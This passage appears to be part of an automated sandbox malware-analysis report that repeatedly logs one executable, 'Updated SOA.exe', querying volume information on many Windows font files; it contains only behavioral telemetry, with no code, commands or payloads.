          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Updated SOA.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
